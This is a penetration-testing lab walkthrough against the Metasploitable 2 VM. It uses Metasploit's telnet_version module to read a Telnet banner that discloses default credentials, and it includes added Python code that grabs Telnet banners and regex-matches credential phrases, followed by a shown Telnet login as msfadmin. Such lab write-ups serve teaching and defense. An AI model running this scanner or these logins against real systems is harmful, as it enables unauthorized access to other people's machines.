The Nmap scan of Metasploitable 2 revealed:
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Most write-ups on the Internet go straight to a password-cracking tool against this Telnet service; there is, however, another way in. A Metasploit scanner module can simply read what the service announces about itself, and here that turns out to be enough:
msf > search telnet
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                Disclosure Date  Rank       Description
   ----                                                ---------------  ----       -----------
   auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
   auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal     Microsoft IIS FTP Server Encoded Response Overflow Trigger
   auxiliary/scanner/telnet/lantronix_telnet_password                   normal     Lantronix Telnet Password Recovery
   auxiliary/scanner/telnet/lantronix_telnet_version                    normal     Lantronix Telnet Service Banner Detection
   auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal     Telnet Service Encyption Key ID Overflow Detection
   auxiliary/scanner/telnet/telnet_login                                normal     Telnet Login Check Scanner
   auxiliary/scanner/telnet/telnet_ruggedcom                            normal     RuggedCom Telnet Password Generator
   auxiliary/scanner/telnet/telnet_version                              normal     Telnet Service Banner Detection
   auxiliary/server/capture/telnet                                      normal     Authentication Capture: Telnet
   exploit/freebsd/ftp/proftp_telnet_iac               2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/freebsd/telnet/telnet_encrypt_keyid         2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
   exploit/linux/ftp/proftp_telnet_iac                 2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/http/dlink_diagnostic_exec_noauth     2013-03-05       excellent  D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
   exploit/linux/http/dlink_dir300_exec_telnet         2013-04-22       excellent  D-Link Devices Unauthenticated Remote Command Execution
   exploit/linux/http/dlink_upnp_exec_noauth_telnetd   2013-07-05       excellent  D-Link Devices UPnP SOAP Telnetd Command Execution
   exploit/linux/telnet/telnet_encrypt_keyid           2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
   exploit/solaris/telnet/fuser                        2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
   exploit/solaris/telnet/ttyprompt                    2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
   exploit/unix/webapp/dogfood_spell_exec              2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
   exploit/windows/proxy/ccproxy_telnet_ping           2004-11-11       average    CCProxy <= v6.2 Telnet Proxy Ping Overflow
   exploit/windows/telnet/gamsoft_telsrv_username      2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
   exploit/windows/telnet/goodtech_telnet              2005-03-15       average    GoodTech Telnet Server <= 5.0.6 Buffer Overflow
   payload/cmd/unix/reverse                                             normal     Unix Command Shell, Double reverse TCP (telnet)
   payload/cmd/unix/reverse_bash_telnet_ssl                             normal     Unix Command Shell, Reverse TCP SSL (telnet)
   payload/cmd/unix/reverse_ssl_double_telnet                           normal     Unix Command Shell, Double Reverse TCP SSL (telnet)
   post/windows/gather/credentials/mremote                              normal     Windows Gather mRemote Saved Password Extraction

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(telnet_version) > set RPORT 23
RPORT => 23
msf auxiliary(telnet_version) > run
[*] 192.168.1.103:23 TELNET                 _                  _       _ _        _     _      ____ \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >
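What telnet_version does under the hood is small: connect, answer the server's option negotiation (the IAC bytes every telnetd sends before its banner), and read until the login prompt. Spotting the credentials in the banner was then done by eye. The script below, added here as an example and not part of the original post or of Metasploit, performs the same two steps and then greps the banner for credential-looking phrases. The target address, the SAMPLE_STREAM bytes (a constructed capture in the Metasploitable 2 style) and the regular expressions are assumptions for illustration; the command and option bytes are from RFC 854 and its option RFCs.

```python
"""Telnet banner grab with a credential check (example code, not from the
original post and not part of Metasploit).  Host, port, the regexes and
SAMPLE_STREAM are assumptions constructed for illustration."""
import re
import socket

# Telnet command bytes from RFC 854
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def strip_telnet_negotiation(data: bytes) -> tuple[bytes, bytes]:
    """Split a raw Telnet read into (banner_text, replies_to_send).

    telnetd sends IAC DO/WILL option requests before and around the login
    banner.  Printed raw they are the 0xff 0xfd ... garbage a plain socket
    read shows, and some servers wait for an answer before sending the
    prompt.  We refuse every option (DO -> WONT, WILL -> DONT), which is
    enough to make the server fall through to the login prompt.
    """
    text, replies = bytearray(), bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= len(data):          # IAC cut off at the end of the read
            break
        cmd = data[i + 1]
        if cmd == IAC:                   # IAC IAC is a literal 0xff data byte
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= len(data):       # option byte cut off
                break
            opt = data[i + 2]
            if cmd == DO:
                replies += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                replies += bytes([IAC, DONT, opt])
            i += 3                       # DONT/WONT need no answer
        elif cmd == SB:                  # sub-negotiation: skip through IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end == -1 else end + 2
        else:                            # other two-byte commands (NOP, GA, ...)
            i += 2
    return bytes(text), bytes(replies)


# Credential-looking phrases worth flagging in a banner (assumed patterns).
CRED_PATTERNS = [
    # "Login with msfadmin/msfadmin to get started"
    re.compile(r"log\s*in\s+with\s+([\w.\-]+)\s*/\s*([\w.\-]+)", re.I),
    # "username: admin  password: admin" and similar
    re.compile(r"user(?:name)?\s*[:=]\s*([\w.\-]+)\W+pass(?:word)?\s*[:=]\s*([\w.\-]+)", re.I),
]


def find_credentials_in_banner(banner: str) -> list[tuple[str, str]]:
    """Return (username, password) pairs that the banner gives away."""
    return [(m.group(1), m.group(2))
            for pat in CRED_PATTERNS for m in pat.finditer(banner)]


def grab_banner(host: str, port: int = 23, timeout: float = 5.0) -> str:
    """Connect, answer option negotiation, read until the login prompt."""
    banner = bytearray()
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            # An IAC sequence split across two recv() calls is not handled
            # here; it is rare within the first few KB of a login banner.
            while b"login:" not in banner.lower() and len(banner) < 8192:
                chunk = s.recv(4096)
                if not chunk:
                    break
                text, replies = strip_telnet_negotiation(chunk)
                if replies:
                    s.sendall(replies)
                banner += text
        except socket.timeout:
            pass                         # whatever arrived by now is the banner
    return bytes(banner).decode("latin-1")


# Constructed sample: the option requests a Linux telnetd typically sends,
# followed by a banner in the Metasploitable 2 style.
SAMPLE_STREAM = (
    b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27"               # DO TTYPE, TSPEED, XDISPLOC, NEW-ENVIRON
    b"\xff\xfb\x03\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x05\xff\xfd\x21"   # WILL SGA, DO ECHO, DO NAWS, WILL STATUS, DO LFLOW
    b"\r\nWarning: Never expose this VM to an untrusted network!\r\n\r\n"
    b"Login with msfadmin/msfadmin to get started\r\n\r\nmetasploitable login: "
)


def scan_sample() -> list[tuple[str, str]]:
    """Offline run over SAMPLE_STREAM: grab_banner's logic minus the socket."""
    text, _replies = strip_telnet_negotiation(SAMPLE_STREAM)
    return find_credentials_in_banner(text.decode("latin-1"))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                # live grab: python3 telnet_banner.py 192.168.1.103
        banner = grab_banner(sys.argv[1])
        print(banner)
        leaks = find_credentials_in_banner(banner)
    else:
        leaks = scan_sample()
    for user, pw in leaks:
        print(f"[!] banner leaks credentials: {user}/{pw}")
```

Run it with the target address as the first argument for a live grab, or with no argument to exercise the constructed sample. Refusing every option is deliberate: a banner grabber wants the server's text, not a working terminal session, and WONT/DONT is always a legal answer, so the negotiation terminates no matter what the server asks for.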
Look carefully at the Telnet banner: it says "Login with msfadmin/msfadmin to get started". The service has handed over a valid username and password before a single guess was sent, which is why a login banner should never carry credentials; it is also a reminder that Telnet sends the login and the whole session in cleartext, so anyone on the path could read them anyway. Armed with the username and password we can connect from the attacking terminal:
# telnet 192.168.1.103
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
                _                  _       _ _        _     _      ____
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|


Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Tue Nov 5 13:12:09 EST 2013 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

msfadmin@metasploitable:~$